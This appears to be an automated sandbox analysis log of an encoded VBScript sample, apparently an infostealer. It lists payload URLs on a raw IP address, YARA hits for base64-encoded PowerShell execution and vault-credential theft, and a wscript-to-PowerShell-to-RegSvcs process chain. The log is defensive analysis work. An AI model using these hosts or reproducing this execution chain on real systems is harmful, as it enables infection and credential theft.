                  Source: wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/l
                  Source: wscript.exe, 00000000.00000003.2098255050.000001E8967A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097077335.000001E8967A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/1210/file
                  Source: wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/1210/thEh4UQ3nf0RsZGPSynf.txtx
                  Source: wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: RegSvcs.exe, 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49751 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi64_6804.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097E2708_2_0097E270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00974A988_2_00974A98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097AA128_2_0097AA12
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00973E808_2_00973E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009741C88_2_009741C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0604A1788_2_0604A178
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060556408_2_06055640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060566688_2_06056668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0605C2008_2_0605C200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0605B2A28_2_0605B2A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060531008_2_06053100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06057DF08_2_06057DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060577108_2_06057710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060524098_2_06052409
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0605E4188_2_0605E418
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060500408_2_06050040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06055D5F8_2_06055D5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_060500068_2_06050006
                  Source: amsi64_6804.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@14/19@1/3
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbsJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2cdss1s.2su.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs"
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
